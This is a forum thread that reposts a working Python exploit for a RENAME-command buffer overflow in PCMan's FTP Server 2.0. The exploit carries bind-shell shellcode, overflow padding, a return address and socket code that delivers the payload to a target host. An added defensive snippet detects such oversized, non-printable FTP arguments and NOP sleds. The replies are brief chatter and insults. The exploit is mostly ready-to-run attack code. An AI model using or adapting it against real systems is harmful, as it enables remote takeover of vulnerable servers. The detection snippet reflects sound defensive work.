Anonym13 Posted September 1, 2015

#!/usr/bin/python
# Exploit Title: PCMan's FTP Server v2.0 - RENAME command remote buffer overflow
# Date: 29 Aug 2015
# Exploit Author: Koby
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3

import socket
import sys

# msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby
# Payload size: 352 bytes
# (bytes literals so the script behaves the same under Python 2 and Python 3)
shellcode = (
    b"\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
    b"\x0e\xb3\x93\xd2\x17\x83\xee\xfc\xe2\xf4\x4f\x7b\x50\x17"
    b"\xb3\x93\xb2\x9e\x56\xa2\x12\x73\x38\xc3\xe2\x9c\xe1\x9f"
    b"\x59\x45\xa7\x18\xa0\x3f\xbc\x24\x98\x31\x82\x6c\x7e\x2b"
    b"\xd2\xef\xd0\x3b\x93\x52\x1d\x1a\xb2\x54\x30\xe5\xe1\xc4"
    b"\x59\x45\xa3\x18\x98\x2b\x38\xdf\xc3\x6f\x50\xdb\xd3\xc6"
    b"\xe2\x18\x8b\x37\xb2\x40\x59\x5e\xab\x70\xe8\x5e\x38\xa7"
    b"\x59\x16\x65\xa2\x2d\xbb\x72\x5c\xdf\x16\x74\xab\x32\x62"
    b"\x45\x90\xaf\xef\x88\xee\xf6\x62\x57\xcb\x59\x4f\x97\x92"
    b"\x01\x71\x38\x9f\x99\x9c\xeb\x8f\xd3\xc4\x38\x97\x59\x16"
    b"\x63\x1a\x96\x33\x97\xc8\x89\x76\xea\xc9\x83\xe8\x53\xcc"
    b"\x8d\x4d\x38\x81\x39\x9a\xee\xfb\xe1\x25\xb3\x93\xba\x60"
    b"\xc0\xa1\x8d\x43\xdb\xdf\xa5\x31\xb4\x6c\x07\xaf\x23\x92"
    b"\xd2\x17\x9a\x57\x86\x47\xdb\xba\x52\x7c\xb3\x6c\x07\x7d"
    b"\xbb\xca\x82\xf5\x4e\xd3\x82\x57\xe3\xfb\x38\x18\x6c\x73"
    b"\x2d\xc2\x24\xfb\xd0\x17\xa2\xcf\x5b\xf1\xd9\x83\x84\x40"
    b"\xdb\x51\x09\x20\xd4\x6c\x07\x40\xdb\x24\x3b\x2f\x4c\x6c"
    b"\x07\x40\xdb\xe7\x3e\x2c\x52\x6c\x07\x40\x24\xfb\xa7\x79"
    b"\xfe\xf2\x2d\xc2\xdb\xf0\xbf\x73\xb3\x1a\x31\x40\xe4\xc4"
    b"\xe3\xe1\xd9\x81\x8b\x41\x51\x6e\xb4\xd0\xf7\xb7\xee\x16"
    b"\xb2\x1e\x96\x33\xa3\x55\xd2\x53\xe7\xc3\x84\x41\xe5\xd5"
    b"\x84\x59\xe5\xc5\x81\x41\xdb\xea\x1e\x28\x35\x6c\x07\x9e"
    b"\x53\xdd\x84\x51\x4c\xa3\xba\x1f\x34\x8e\xb2\xe8\x66\x28"
    b"\x22\xa2\x11\xc5\xba\xb1\x26\x2e\x4f\xe8\x66\xaf\xd4\x6b"
    b"\xb9\x13\x29\xf7\xc6\x96\x69\x50\xa0\xe1\xbd\x7d\xb3\xc0"
    b"\x2d\xc2"
)

# buffer overflow was found by fuzzing with ftp_pre_post (metasploit)
# bad data is a string of 2004 "A" characters to get to an EIP overwrite
# followed by the JMP ESP instruction 0x7cb48eed in SYSTEM32.dll
baddata = b'\x41' * 2004 + b'\xed\x8e\xb4\x7c'

# login to ftp followed by sending the bad data & payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.1.135', 21))
s.recv(1024)
s.send(b'USER anonymous\r\n')
s.recv(1024)
s.send(b'PASS anonymous\r\n')
s.recv(1024)
s.send(b'RENAME ' + baddata + b'\x90' * 50 + shellcode + b'\r\n')
s.close()
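As an added defender-side example (not part of the original post or of the exploit it reproduces), a small scanner that flags FTP command lines carrying the traits of this overflow: an argument far longer than any real filename, non-printable bytes, and a NOP sled. The sample command lines, the 512-byte threshold and the 0xdeadbeef return-address placeholder are constructed assumptions.

```python
import re

# Constructed sample FTP command lines (bytes, as read off the wire). The long
# RENAME mirrors the layout of the overflow above: filler, a 4-byte return
# address (placeholder value here), a NOP sled, then opaque payload bytes.
SAMPLE_COMMANDS = [
    b"USER anonymous\r\n",
    b"PASS anonymous\r\n",
    b"RENAME old.txt\r\n",
    b"RENAME " + b"A" * 2004 + b"\xde\xad\xbe\xef" + b"\x90" * 50 + b"\xcc" * 40 + b"\r\n",
]

# RFC 959 sets no hard limit on argument length, so the threshold is a policy
# choice (assumed here): the overflow needs over two thousand bytes while
# Windows paths stay under 260, so 512 leaves headroom without missing it.
MAX_ARG_LEN = 512
NOP_SLED = re.compile(rb"\x90{16,}")


def inspect_command(line):
    """Return a list of findings for one FTP command line (empty when clean)."""
    findings = []
    body = line.rstrip(b"\r\n")
    parts = body.split(b" ", 1)
    verb = parts[0].upper()
    arg = parts[1] if len(parts) > 1 else b""
    if len(arg) > MAX_ARG_LEN:
        findings.append("oversized_argument:%s:%d" % (verb.decode("ascii", "replace"), len(arg)))
    # Filenames are printable ASCII; raw machine code and addresses are not.
    if any(b < 0x20 or b > 0x7E for b in arg):
        findings.append("non_printable_bytes")
    if NOP_SLED.search(arg):
        findings.append("nop_sled")
    return findings


def scan(lines):
    """Map the index of each suspicious line to its findings."""
    return {i: f for i, f in ((i, inspect_command(l)) for i, l in enumerate(lines)) if f}
```

Running scan(SAMPLE_COMMANDS) reports only the fourth line, with all three findings; the first three are clean.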
hades Posted September 1, 2015
Why s.recv(1024)? Can't recv() be called without an explicit number?
MrGrj (Active Members) Posted September 1, 2015
s.recv(1024) reads at most 1024 bytes.
hades Posted September 1, 2015
@MrGrj: The question wasn't for you.
Anonym13 (Author) Posted September 1, 2015
> @MrGrj: The question wasn't for you.
i don't know, Mr. Professor.
Lu.ex Posted September 1, 2015
@Anonym13, you're eating shit with a teaspoon.
https://www.exploit-db.com/exploits/26471/
Anonym13 (Author) Posted September 1, 2015
> @Anonym13, you're eating shit with a teaspoon.
> https://www.exploit-db.com/exploits/26471/
Exploit Author: Koby, suck shit.